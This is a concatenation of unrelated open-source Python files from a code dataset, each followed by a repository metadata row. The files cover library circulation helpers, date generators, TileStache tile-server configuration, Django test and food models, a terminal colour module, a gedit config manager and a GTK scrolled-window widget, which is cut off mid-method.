if len(copies_status) == 0:
return False
else:
return True
def generate_email_body(template, loan_id):
"""
Generate the body of an email for loan recalls.
@param template: email template
@type template: string
@param loan_id: identify the loan. Primary key of crcLOAN.
@type loan_id: int
@return email(body)
"""
recid = db.get_loan_recid(loan_id)
(book_title, book_year, book_author,
book_isbn, book_editor) = book_information_from_MARC(int(recid))
out = template % (book_title, book_year, book_author,
book_isbn, book_editor)
return out
def create_item_details_url(recid, ln):
"""
Generate the URL redirecting to the edition of record copies
@param recid: The identifier of the record
@type recid: int
@param ln: The language identifier
@type ln: string
@return A string being the URL allowing to edit currently viewed record
"""
url = '/admin/bibcirculation/bibcirculationadmin.py/get_item_details?ln=%s&recid=%s' % (ln, str(recid))
return CFG_SITE_URL + url
def looks_like_dictionary(candidate_string):
if re.match(DICC_REGEXP, candidate_string):
return True
else:
return False
| gpl-2.0 | -8,326,159,641,433,594,000 | 29.505698 | 118 | 0.543638 | false |
HiSPARC/publicdb | publicdb/raw_data/date_generator.py | 1 | 1373 | import datetime
def daterange(start, stop):
"""Generator for date ranges
This is a generator for date ranges. Based on a start and stop value,
it generates one day intervals.
:param start: a date instance, end of range
:param stop: a date instance, end of range
:yield date: dates with one day interval between start and stop
"""
if start == stop:
yield start
return
else:
yield start
cur = start
while cur < stop:
cur += datetime.timedelta(days=1)
yield cur
return
def single_day_ranges(start, end):
"""Generate datetime ranges consisting of a single day.
Generate datetime ranges, a single day at a time. The generator keeps
returning two datetime values, making up a range of a full day.
However, the first and last days may be shorter, if a specific
time-of-day was specified.
:param start: a datetime instance, start of range
:param end: a datetime instance, end of range
:yield cur,next: date intervals between start and stop
"""
cur = start
next_day = (cur.replace(hour=0, minute=0, second=0, microsecond=0) +
datetime.timedelta(days=1))
while next_day < end:
yield cur, next_day
cur = next_day
next_day = cur + datetime.timedelta(days=1)
yield cur, end
| gpl-3.0 | -3,784,288,338,580,211,700 | 27.604167 | 74 | 0.639476 | false |
TileStache/TileStache | TileStache/Config.py | 1 | 15616 | """ The configuration bits of TileStache.
TileStache configuration is stored in JSON files, and is composed of two main
top-level sections: "cache" and "layers". There are examples of both in this
minimal sample configuration:
{
"cache": {"name": "Test"},
"layers": {
"example": {
"provider": {"name": "mapnik", "mapfile": "examples/style.xml"},,
"projection": "spherical mercator"
}
}
}
The contents of the "cache" section are described in greater detail in the
TileStache.Caches module documentation. Here is a different sample:
"cache": {
"name": "Disk",
"path": "/tmp/stache",
"umask": "0000"
}
The "layers" section is a dictionary of layer names which are specified in the
URL of an individual tile. More detail on the configuration of individual layers
can be found in the TileStache.Core module documentation. Another sample:
{
"cache": ...,
"layers":
{
"example-name":
{
"provider": { ... },
"metatile": { ... },
"preview": { ... },
"stale lock timeout": ...,
"projection": ...
}
}
}
Configuration also supports these additional settings:
- "logging": one of "debug", "info", "warning", "error" or "critical", as
described in Python's logging module: http://docs.python.org/howto/logging.html
- "index": configurable index pages for the front page of an instance.
A custom index can be specified as a filename relative to the configuration
location. Typically an HTML document would be given here, but other kinds of
files such as images can be used, with MIME content-type headers determined
by mimetypes.guess_type. A simple text greeting is displayed if no index
is provided.
In-depth explanations of the layer components can be found in the module
documentation for TileStache.Providers, TileStache.Core, and TileStache.Geography.
"""
import sys
import logging
from os.path import join as pathjoin
from mimetypes import guess_type
from json import dumps
try:
from json import dumps as json_dumps
except ImportError:
from simplejson import dumps as json_dumps
from ModestMaps.Geo import Location
from ModestMaps.Core import Coordinate
from . import Core
from . import Caches
from . import Providers
from . import Geography
from . import PixelEffects
from .py3_compat import reduce, urljoin, urlparse, urlopen
class Configuration:
""" A complete site configuration, with a collection of Layer objects.
Attributes:
cache:
Cache instance, e.g. TileStache.Caches.Disk etc.
See TileStache.Caches for details on what makes
a usable cache.
layers:
Dictionary of layers keyed by name.
When creating a custom layers dictionary, e.g. for dynamic
layer collections backed by some external configuration,
these dictionary methods must be provided for a complete
collection of layers:
keys():
Return list of layer name strings.
items():
Return list of (name, layer) pairs.
__contains__(key):
Return boolean true if given key is an existing layer.
__getitem__(key):
Return existing layer object for given key or raise KeyError.
dirpath:
Local filesystem path for this configuration,
useful for expanding relative paths.
Optional attribute:
index:
Mimetype, content tuple for default index response.
"""
def __init__(self, cache, dirpath):
self.cache = cache
self.dirpath = dirpath
self.layers = {}
self.index = 'text/plain', 'TileStache bellows hello.'
class Bounds:
""" Coordinate bounding box for tiles.
"""
def __init__(self, upper_left_high, lower_right_low):
""" Two required Coordinate objects defining tile pyramid bounds.
Boundaries are inclusive: upper_left_high is the left-most column,
upper-most row, and highest zoom level; lower_right_low is the
right-most column, furthest-dwn row, and lowest zoom level.
"""
self.upper_left_high = upper_left_high
self.lower_right_low = lower_right_low
def excludes(self, tile):
""" Check a tile Coordinate against the bounds, return true/false.
"""
if tile.zoom > self.upper_left_high.zoom:
# too zoomed-in
return True
if tile.zoom < self.lower_right_low.zoom:
# too zoomed-out
return True
# check the top-left tile corner against the lower-right bound
_tile = tile.zoomTo(self.lower_right_low.zoom)
if _tile.column > self.lower_right_low.column:
# too far right
return True
if _tile.row > self.lower_right_low.row:
# too far down
return True
# check the bottom-right tile corner against the upper-left bound
__tile = tile.right().down().zoomTo(self.upper_left_high.zoom)
if __tile.column < self.upper_left_high.column:
# too far left
return True
if __tile.row < self.upper_left_high.row:
# too far up
return True
return False
def __str__(self):
return 'Bound %s - %s' % (self.upper_left_high, self.lower_right_low)
class BoundsList:
""" Multiple coordinate bounding boxes for tiles.
"""
def __init__(self, bounds):
""" Single argument is a list of Bounds objects.
"""
self.bounds = bounds
def excludes(self, tile):
""" Check a tile Coordinate against the bounds, return false if none match.
"""
for bound in self.bounds:
if not bound.excludes(tile):
return False
# Nothing worked.
return True
def buildConfiguration(config_dict, dirpath='.'):
""" Build a configuration dictionary into a Configuration object.
The second argument is an optional dirpath that specifies where in the
local filesystem the parsed dictionary originated, to make it possible
to resolve relative paths. It might be a path or more likely a full
URL including the "file://" prefix.
"""
scheme, h, path, p, q, f = urlparse(dirpath)
if scheme in ('', 'file'):
sys.path.insert(0, path)
cache_dict = config_dict.get('cache', {})
cache = _parseConfigCache(cache_dict, dirpath)
config = Configuration(cache, dirpath)
for (name, layer_dict) in config_dict.get('layers', {}).items():
config.layers[name] = _parseConfigLayer(layer_dict, config, dirpath)
if 'index' in config_dict:
index_href = urljoin(dirpath, config_dict['index'])
index_body = urlopen(index_href).read()
index_type = guess_type(index_href)
config.index = index_type[0], index_body
if 'logging' in config_dict:
level = config_dict['logging'].upper()
if hasattr(logging, level):
logging.basicConfig(level=getattr(logging, level))
return config
def enforcedLocalPath(relpath, dirpath, context='Path'):
""" Return a forced local path, relative to a directory.
Throw an error if the combination of path and directory seems to
specify a remote path, e.g. "/path" and "http://example.com".
Although a configuration file can be parsed from a remote URL, some
paths (e.g. the location of a disk cache) must be local to the server.
In cases where we mix a remote configuration location with a local
cache location, e.g. "http://example.com/tilestache.cfg", the disk path
must include the "file://" prefix instead of an ambiguous absolute
path such as "/tmp/tilestache".
"""
parsed_dir = urlparse(dirpath)
parsed_rel = urlparse(relpath)
if parsed_rel.scheme not in ('file', ''):
raise Core.KnownUnknown('%s path must be a local file path, absolute or "file://", not "%s".' % (context, relpath))
if parsed_dir.scheme not in ('file', '') and parsed_rel.scheme != 'file':
raise Core.KnownUnknown('%s path must start with "file://" in a remote configuration ("%s" relative to %s)' % (context, relpath, dirpath))
if parsed_rel.scheme == 'file':
# file:// is an absolute local reference for the disk cache.
return parsed_rel.path
if parsed_dir.scheme == 'file':
# file:// is an absolute local reference for the directory.
return urljoin(parsed_dir.path, parsed_rel.path)
# nothing has a scheme, it's probably just a bunch of
# dumb local paths, so let's see what happens next.
return pathjoin(dirpath, relpath)
def _parseConfigCache(cache_dict, dirpath):
""" Used by parseConfig() to parse just the cache parts of a config.
"""
if 'name' in cache_dict:
_class = Caches.getCacheByName(cache_dict['name'])
kwargs = {}
def add_kwargs(*keys):
""" Populate named keys in kwargs from cache_dict.
"""
for key in keys:
if key in cache_dict:
kwargs[key] = cache_dict[key]
if _class is Caches.Test:
if cache_dict.get('verbose', False):
kwargs['logfunc'] = lambda msg: sys.stderr.write(msg + '\n')
elif _class is Caches.Disk:
kwargs['path'] = enforcedLocalPath(cache_dict['path'], dirpath, 'Disk cache path')
if 'umask' in cache_dict:
kwargs['umask'] = int(cache_dict['umask'], 8)
add_kwargs('dirs', 'gzip')
elif _class is Caches.Multi:
kwargs['tiers'] = [_parseConfigCache(tier_dict, dirpath)
for tier_dict in cache_dict['tiers']]
elif _class is Caches.Memcache.Cache:
if 'key prefix' in cache_dict:
kwargs['key_prefix'] = cache_dict['key prefix']
add_kwargs('servers', 'lifespan', 'revision')
elif _class is Caches.Redis.Cache:
if 'key prefix' in cache_dict:
kwargs['key_prefix'] = cache_dict['key prefix']
add_kwargs('host', 'port', 'db')
elif _class is Caches.S3.Cache:
add_kwargs('bucket', 'access', 'secret', 'use_locks', 'path', 'reduced_redundancy', 'policy')
else:
raise Exception('Unknown cache: %s' % cache_dict['name'])
elif 'class' in cache_dict:
_class = Core.loadClassPath(cache_dict['class'])
kwargs = cache_dict.get('kwargs', {})
kwargs = dict( [(str(k), v) for (k, v) in kwargs.items()] )
else:
raise Exception('Missing required cache name or class: %s' % json_dumps(cache_dict))
cache = _class(**kwargs)
return cache
def _parseLayerBounds(bounds_dict, projection):
"""
"""
north, west = bounds_dict.get('north', 89), bounds_dict.get('west', -180)
south, east = bounds_dict.get('south', -89), bounds_dict.get('east', 180)
high, low = bounds_dict.get('high', 31), bounds_dict.get('low', 0)
try:
ul_hi = projection.locationCoordinate(Location(north, west)).zoomTo(high)
lr_lo = projection.locationCoordinate(Location(south, east)).zoomTo(low)
except TypeError:
raise Core.KnownUnknown('Bad bounds for layer, need north, south, east, west, high, and low: ' + dumps(bounds_dict))
return Bounds(ul_hi, lr_lo)
def _parseConfigLayer(layer_dict, config, dirpath):
""" Used by parseConfig() to parse just the layer parts of a config.
"""
projection = layer_dict.get('projection', 'spherical mercator')
projection = Geography.getProjectionByName(projection)
#
# Add cache lock timeouts and preview arguments
#
layer_kwargs = {}
if 'cache lifespan' in layer_dict:
layer_kwargs['cache_lifespan'] = int(layer_dict['cache lifespan'])
if 'stale lock timeout' in layer_dict:
layer_kwargs['stale_lock_timeout'] = int(layer_dict['stale lock timeout'])
if 'write cache' in layer_dict:
layer_kwargs['write_cache'] = bool(layer_dict['write cache'])
if 'allowed origin' in layer_dict:
layer_kwargs['allowed_origin'] = str(layer_dict['allowed origin'])
if 'maximum cache age' in layer_dict:
layer_kwargs['max_cache_age'] = int(layer_dict['maximum cache age'])
if 'redirects' in layer_dict:
layer_kwargs['redirects'] = dict(layer_dict['redirects'])
if 'tile height' in layer_dict:
layer_kwargs['tile_height'] = int(layer_dict['tile height'])
if 'preview' in layer_dict:
preview_dict = layer_dict['preview']
for (key, func) in zip(('lat', 'lon', 'zoom', 'ext'), (float, float, int, str)):
if key in preview_dict:
layer_kwargs['preview_' + key] = func(preview_dict[key])
#
# Do the bounds
#
if 'bounds' in layer_dict:
if type(layer_dict['bounds']) is dict:
layer_kwargs['bounds'] = _parseLayerBounds(layer_dict['bounds'], projection)
elif type(layer_dict['bounds']) is list:
bounds = [_parseLayerBounds(b, projection) for b in layer_dict['bounds']]
layer_kwargs['bounds'] = BoundsList(bounds)
else:
raise Core.KnownUnknown('Layer bounds must be a dictionary, not: ' + dumps(layer_dict['bounds']))
#
# Do the metatile
#
meta_dict = layer_dict.get('metatile', {})
metatile_kwargs = {}
for k in ('buffer', 'rows', 'columns'):
if k in meta_dict:
metatile_kwargs[k] = int(meta_dict[k])
metatile = Core.Metatile(**metatile_kwargs)
#
# Do the per-format options
#
jpeg_kwargs = {}
png_kwargs = {}
if 'jpeg options' in layer_dict:
jpeg_kwargs = dict([(str(k), v) for (k, v) in layer_dict['jpeg options'].items()])
if 'png options' in layer_dict:
png_kwargs = dict([(str(k), v) for (k, v) in layer_dict['png options'].items()])
#
# Do pixel effect
#
pixel_effect = None
if 'pixel effect' in layer_dict:
pixel_effect_dict = layer_dict['pixel effect']
pixel_effect_name = pixel_effect_dict.get('name')
if pixel_effect_name in PixelEffects.all:
pixel_effect_kwargs = {}
for k, v in pixel_effect_dict.items():
if k != 'name':
pixel_effect_kwargs[str(k)] = float(v)
PixelEffectClass = PixelEffects.all[pixel_effect_name]
pixel_effect = PixelEffectClass(**pixel_effect_kwargs)
#
# Do the provider
#
provider_dict = layer_dict['provider']
if 'name' in provider_dict:
_class = Providers.getProviderByName(provider_dict['name'])
provider_kwargs = _class.prepareKeywordArgs(provider_dict)
elif 'class' in provider_dict:
_class = Core.loadClassPath(provider_dict['class'])
provider_kwargs = provider_dict.get('kwargs', {})
provider_kwargs = dict( [(str(k), v) for (k, v) in provider_kwargs.items()] )
else:
raise Exception('Missing required provider name or class: %s' % json_dumps(provider_dict))
#
# Finish him!
#
layer = Core.Layer(config, projection, metatile, **layer_kwargs)
layer.provider = _class(layer, **provider_kwargs)
layer.setSaveOptionsJPEG(**jpeg_kwargs)
layer.setSaveOptionsPNG(**png_kwargs)
layer.pixel_effect = pixel_effect
return layer
| bsd-3-clause | -1,455,473,924,395,118,800 | 32.367521 | 146 | 0.613473 | false |
labcodes/django | tests/schema/models.py | 1 | 4719 | from django.apps.registry import Apps
from django.db import models
# Because we want to test creation and deletion of these as separate things,
# these models are all inserted into a separate Apps so the main test
# runner doesn't migrate them.
new_apps = Apps()
class Author(models.Model):
name = models.CharField(max_length=255)
height = models.PositiveIntegerField(null=True, blank=True)
weight = models.IntegerField(null=True, blank=True)
class Meta:
apps = new_apps
class AuthorTextFieldWithIndex(models.Model):
text_field = models.TextField(db_index=True)
class Meta:
apps = new_apps
class AuthorWithDefaultHeight(models.Model):
name = models.CharField(max_length=255)
height = models.PositiveIntegerField(null=True, blank=True, default=42)
class Meta:
apps = new_apps
class AuthorWithEvenLongerName(models.Model):
name = models.CharField(max_length=255)
height = models.PositiveIntegerField(null=True, blank=True)
class Meta:
apps = new_apps
class AuthorWithIndexedName(models.Model):
name = models.CharField(max_length=255, db_index=True)
class Meta:
apps = new_apps
class Book(models.Model):
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
# tags = models.ManyToManyField("Tag", related_name="books")
class Meta:
apps = new_apps
class BookWeak(models.Model):
author = models.ForeignKey(Author, models.CASCADE, db_constraint=False)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
class Meta:
apps = new_apps
class BookWithLongName(models.Model):
author_foreign_key_with_really_long_field_name = models.ForeignKey(
AuthorWithEvenLongerName,
models.CASCADE,
)
class Meta:
apps = new_apps
class BookWithO2O(models.Model):
author = models.OneToOneField(Author, models.CASCADE)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
class Meta:
apps = new_apps
db_table = "schema_book"
class BookWithSlug(models.Model):
author = models.ForeignKey(Author, models.CASCADE)
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
slug = models.CharField(max_length=20, unique=True)
class Meta:
apps = new_apps
db_table = "schema_book"
class BookWithoutAuthor(models.Model):
title = models.CharField(max_length=100, db_index=True)
pub_date = models.DateTimeField()
class Meta:
apps = new_apps
db_table = "schema_book"
class BookForeignObj(models.Model):
title = models.CharField(max_length=100, db_index=True)
author_id = models.IntegerField()
class Meta:
apps = new_apps
class IntegerPK(models.Model):
i = models.IntegerField(primary_key=True)
j = models.IntegerField(unique=True)
class Meta:
apps = new_apps
db_table = "INTEGERPK" # uppercase to ensure proper quoting
class Note(models.Model):
info = models.TextField()
class Meta:
apps = new_apps
class NoteRename(models.Model):
detail_info = models.TextField()
class Meta:
apps = new_apps
db_table = "schema_note"
class Tag(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(unique=True)
class Meta:
apps = new_apps
class TagIndexed(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(unique=True)
class Meta:
apps = new_apps
index_together = [["slug", "title"]]
class TagM2MTest(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(unique=True)
class Meta:
apps = new_apps
class TagUniqueRename(models.Model):
title = models.CharField(max_length=255)
slug2 = models.SlugField(unique=True)
class Meta:
apps = new_apps
db_table = "schema_tag"
# Based on tests/reserved_names/models.py
class Thing(models.Model):
when = models.CharField(max_length=1, primary_key=True)
class Meta:
db_table = 'drop'
def __str__(self):
return self.when
class UniqueTest(models.Model):
year = models.IntegerField()
slug = models.SlugField(unique=False)
class Meta:
apps = new_apps
unique_together = ["year", "slug"]
class Node(models.Model):
node_id = models.AutoField(primary_key=True)
parent = models.ForeignKey('self', models.CASCADE, null=True, blank=True)
class Meta:
apps = new_apps
| bsd-3-clause | 8,553,160,393,117,914,000 | 22.595 | 77 | 0.671117 | false |
ddurieux/alignak | alignak/misc/termcolor.py | 1 | 5121 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# coding: utf-8
# Copyright (c) 2008-2011 Volvox Development Team
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Author: Konstantin Lepa <[email protected]>
"""ANSII Color formatting for output in terminal."""
from __future__ import print_function
import os
__ALL__ = ['colored', 'cprint']
VERSION = (1, 1, 0)
ATTRIBUTES = dict(
list(
zip([
'bold',
'dark',
'',
'underline',
'blink',
'',
'reverse',
'concealed'
],
list(range(1, 9))
)
)
)
del ATTRIBUTES['']
HIGHLIGHTS = dict(
list(
zip([
'on_grey',
'on_red',
'on_green',
'on_yellow',
'on_blue',
'on_magenta',
'on_cyan',
'on_white'
],
list(range(40, 48))
)
)
)
COLORS = dict(
list(
zip([
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white',
],
list(range(90, 98))
)
)
)
RESET = '\033[0m'
def colored(text, color=None, on_color=None, attrs=None):
"""Colorize text.
Available text colors:
red, green, yellow, blue, magenta, cyan, white.
Available text highlights:
on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_white.
Available attributes:
bold, dark, underline, blink, reverse, concealed.
Example:
colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink'])
colored('Hello, World!', 'green')
"""
if os.getenv('ANSI_COLORS_DISABLED') is None:
fmt_str = '\033[%dm%s'
if color is not None:
text = fmt_str % (COLORS[color], text)
if on_color is not None:
text = fmt_str % (HIGHLIGHTS[on_color], text)
if attrs is not None:
for attr in attrs:
text = fmt_str % (ATTRIBUTES[attr], text)
# Alignak mod
if color is not None:
text += RESET
return text
def cprint(text, color=None, on_color=None, attrs=None, **kwargs):
"""Print colorize text.
It accepts arguments of print function.
"""
print((colored(text, color, on_color, attrs)), **kwargs)
if __name__ == '__main__':
print('Current terminal type: %s' % os.getenv('TERM'))
print('Test basic colors:')
cprint('Grey color', 'grey')
cprint('Red color', 'red')
cprint('Green color', 'green')
cprint('Yellow color', 'yellow')
cprint('Blue color', 'blue')
cprint('Magenta color', 'magenta')
cprint('Cyan color', 'cyan')
cprint('White color', 'white')
print(('-' * 78))
print('Test highlights:')
cprint('On grey color', on_color='on_grey')
cprint('On red color', on_color='on_red')
cprint('On green color', on_color='on_green')
cprint('On yellow color', on_color='on_yellow')
cprint('On blue color', on_color='on_blue')
cprint('On magenta color', on_color='on_magenta')
cprint('On cyan color', on_color='on_cyan')
cprint('On white color', color='grey', on_color='on_white')
print('-' * 78)
print('Test attributes:')
cprint('Bold grey color', 'grey', attrs=['bold'])
cprint('Dark red color', 'red', attrs=['dark'])
cprint('Underline green color', 'green', attrs=['underline'])
cprint('Blink yellow color', 'yellow', attrs=['blink'])
cprint('Reversed blue color', 'blue', attrs=['reverse'])
cprint('Concealed Magenta color', 'magenta', attrs=['concealed'])
cprint('Bold underline reverse cyan color', 'cyan',
attrs=['bold', 'underline', 'reverse'])
cprint('Dark blink concealed white color', 'white',
attrs=['dark', 'blink', 'concealed'])
print(('-' * 78))
print('Test mixing:')
cprint('Underline red on grey color', 'red', 'on_grey',
['underline'])
cprint('Reversed green on red color', 'green', 'on_red', ['reverse'])
| agpl-3.0 | -3,544,723,343,725,155,000 | 28.096591 | 79 | 0.582894 | false |
rsgemignani/dotfiles | root/usr/lib/gedit/plugins/smart_highlight/config_manager.py | 1 | 2226 | # -*- encoding:utf-8 -*-
# config_manager.py is part of smart-highlighting-gedit.
#
#
# Copyright 2010-2012 swatch
#
# smart-highlighting-gedit is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
from xml.dom.minidom import parse
class ConfigManager:
def __init__(self, filename):
if os.path.exists(filename) == True:
self.config_file = filename
self.dom = parse(filename) # parse an XML file by name
#self.root = self.dom.documentElement
def get_configure(self, branch, attr):
root = self.dom.documentElement
nodes = root.getElementsByTagName(branch)
for i in range(0, len(nodes)):
if nodes[i].getAttribute('name') == attr:
return nodes[i].firstChild.nodeValue
def load_configure(self, branch):
root = self.dom.documentElement
nodes = root.getElementsByTagName(branch)
dic = {}
for i in range(0, len(nodes)):
dic[nodes[i].getAttribute('name')] = nodes[i].firstChild.nodeValue
return dic
def update_config_file(self, filename, branch, dic):
root = self.dom.documentElement
nodes = root.getElementsByTagName(branch)
for i in range(0, len(nodes)):
nodes[i].firstChild.nodeValue = dic[nodes[i].getAttribute('name')]
f = open(filename, 'w+')
#print(bytes.decode(self.dom.toprettyxml('', '', 'utf-8'), 'utf-8'))
f.write(bytes.decode(self.dom.toprettyxml('', '', 'utf-8'), 'utf-8'))
f.close
def boolean(self, string):
return string.lower() in ['true', 'yes', 't', 'y', 'ok', '1']
def to_bool(self, dic):
for key in list(dic.keys()):
dic[key] = self.boolean(dic[key])
if __name__ == '__main__':
pass
| gpl-2.0 | 8,742,912,433,380,789,000 | 30.352113 | 82 | 0.699461 | false |
jsidew/jakidy | src/food/models.py | 1 | 1882 | from django.db import models
class Food(models.Model):
name = models.CharField(max_length=45)
protein = models.DecimalField(max_digits=4, decimal_places=2)
carbs = models.DecimalField(max_digits=4, decimal_places=2)
fat = models.DecimalField(max_digits=4, decimal_places=2)
price = models.DecimalField(max_digits=5, decimal_places=2)
notes = models.TextField()
@property
def calories_tot(self):
return int(round(self.protein*4 + self.carbs*4 + self.fat*9))
@property
def calories_protein(self):
return self.protein * 4
@property
def calories_carbs(self):
return self.carbs * 4
@property
def calories_fat(self):
return self.fat * 9
class Meal(models.Model):
name = models.CharField(max_length=45)
label = models.TextField()
foods = models.ManyToManyField(Food, through='Quantity')
@property
def foodlist(self):
return self.foods.all()
@property
def macros(self):
m = {
'protein': 0,
'carbs': 0,
'fat': 0,
'kcal': 0,
'price': 0
}
for f in self.foods.all():
g = self.quantity_set.get(food=f, meal=self).grams
m['protein'] = m['protein'] + f.protein / 100 * g
m['carbs'] = m['carbs'] + f.carbs / 100 * g
m['fat'] = m['fat'] + f.fat / 100 * g
m['price'] = m['price'] + f.price / 1000 * g
m['protein'] = int(round(m['protein']))
m['carbs'] = int(round(m['carbs']))
m['fat'] = int(round(m['fat']))
m['kcal'] = m['protein']*4 + m['carbs']*4 + m['fat']*9
m['price'] = round(m['price'], 2)
return m
class Quantity(models.Model):
food = models.ForeignKey(Food)
grams = models.DecimalField(max_digits=6, decimal_places=2)
meal = models.ForeignKey(Meal)
| gpl-3.0 | 3,854,542,961,084,282,000 | 32.017544 | 69 | 0.565887 | false |
netphi/deepin-ui | dtk/ui/scrolled_window.py | 1 | 21880 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 ~ 2012 Deepin, Inc.
# 2011 ~ 2012 Xia Bin
#
# Author: Xia Bin <[email protected]>
# Maintainer: Xia Bin <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gtk import gdk
from theme import ui_theme
from utils import remove_signal_id, color_hex_to_cairo
import gobject
import gtk
# the p_range is the virtual width/height, it's value is smaller than
# the allocation.width/height when scrollbar's width/height smaller than
# the minmum scrollbar length.
# p_range = allocation.width/height - (min_bar_len - *bar_len*)
# the *bar_len* = (adj.page_size / adj.upper) * allocation.width/height
# by this processing, 0~(adj.upper-adj.page_size) will be mapped to 0~p_range.
def value2pos(value, p_range, upper):
'''compute the scrollbar position by the adjustment value'''
if upper == 0: return 0
return p_range * float(value) / upper
def pos2value(pos, p_range, upper):
'''compute the adjustment value by the scrollbar position'''
if p_range == 0 : return 0
return pos * upper / p_range
class ScrolledWindow(gtk.Bin):
'''Scrolled window.'''
def __init__(self, right_space=2, top_bootm_space=3):
'''Init scrolled window.'''
gtk.Bin.__init__(self)
self.bar_min_length = 50 #scrollbar smallest height
self.bar_small_width = 7
self.bar_width = 14 #normal scrollbar width
self.bar_background = ui_theme.get_color("scrolledbar")
self.right_space = right_space
self.top_bootm_space = top_bootm_space
self.h_value_change_id = None
self.h_change_id = None
self.v_value_change_id = None
self.v_change_id = None
class Record():
def __init__(self):
self.bar_len = 0 #scrollbar length
self.last_pos = 0 #last mouse motion pointer's position (x or y)
#last mouse motion timestamp, if user moved the window
#then the last_pos is likely become invalid so we need "last_time"
#to deal with this situation.
self.last_time = 0
self.virtual_len = 0 #the virtual window height or width length
self.bar_pos = 0 #the scrollbar topcorner/leftcorner position
self.is_inside = False # is pointer in the scrollbar region?
self.in_motion = False # is user is draging scrollbar?
self.policy = gtk.POLICY_AUTOMATIC
self._horizaontal = Record()
self._vertical = Record()
self.set_can_focus(True)
self.vallocation = gdk.Rectangle()
self.hallocation = gdk.Rectangle()
self.set_vadjustment(gtk.Adjustment())
self.set_hadjustment(gtk.Adjustment())
self.set_has_window(False)
def do_expose_event(self, e):
if e.window == self.vwindow:
self.draw_vbar()
return True
elif e.window == self.hwindow:
self.draw_hbar()
return True
else:
return False
def draw_vbar(self):
#img = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = self.vwindow.cairo_create()
cr.set_source_rgb(*color_hex_to_cairo(self.bar_background.get_color()))
cr.rectangle(0, 0, self.vallocation.width, self.vallocation.height)
cr.fill()
def draw_hbar(self):
cr = self.hwindow.cairo_create()
cr.set_source_rgb(*color_hex_to_cairo(self.bar_background.get_color()))
cr.rectangle(0, 0, self.hallocation.width, self.hallocation.height)
cr.fill()
def do_button_release_event(self, e):
if e.window == self.hwindow:
self._horizaontal.in_motion = False
if not self._horizaontal.is_inside:
self.make_bar_smaller(gtk.ORIENTATION_HORIZONTAL)
return True
elif e.window == self.vwindow:
self._vertical.in_motion = False
if not self._vertical.is_inside:
self.make_bar_smaller(gtk.ORIENTATION_VERTICAL)
return True
else:
return False
def make_bar_smaller(self, orientation):
if orientation == gtk.ORIENTATION_HORIZONTAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, int(self._horizaontal.bar_len), self.bar_small_width))
if self.hallocation.x == 0:
self.hwindow.shape_combine_region(region, self.top_bootm_space, self.bar_width - self.bar_small_width -self.right_space)
else:
self.hwindow.shape_combine_region(region, -self.top_bootm_space, self.bar_width - self.bar_small_width -self.right_space)
elif orientation == gtk.ORIENTATION_VERTICAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, self.bar_small_width, int(self._vertical.bar_len)))
if self.vallocation.y == 0:
self.vwindow.shape_combine_region(region, self.bar_width-self.bar_small_width - self.right_space, self.top_bootm_space)
else:
self.vwindow.shape_combine_region(region, self.bar_width-self.bar_small_width - self.right_space, -self.top_bootm_space)
else:
raise "make_bar_smaller's orientation must be gtk.ORIENTATION_VERTICAL or gtk.ORIENTATION_HORIZONTAL"
return False
def make_bar_bigger(self, orientation):
if orientation == gtk.ORIENTATION_HORIZONTAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, int(self._horizaontal.bar_len), self.bar_width))
if self.hallocation.x == 0:
self.hwindow.shape_combine_region(region, self.top_bootm_space, -self.right_space)
else:
self.hwindow.shape_combine_region(region, -self.top_bootm_space, -self.right_space)
elif orientation == gtk.ORIENTATION_VERTICAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, self.bar_width, int(self._vertical.bar_len)))
if self.vallocation.y == 0:
